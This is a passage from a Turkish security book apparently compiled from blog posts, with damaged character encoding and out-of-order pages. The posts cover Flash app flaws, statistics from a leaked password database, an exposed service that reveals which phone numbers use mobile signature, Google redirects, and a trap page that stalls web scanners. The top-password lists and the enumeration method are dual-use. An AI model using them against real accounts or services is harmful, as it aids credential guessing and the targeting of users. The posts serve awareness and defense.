olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 26: Hack 4 Career - 2011

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

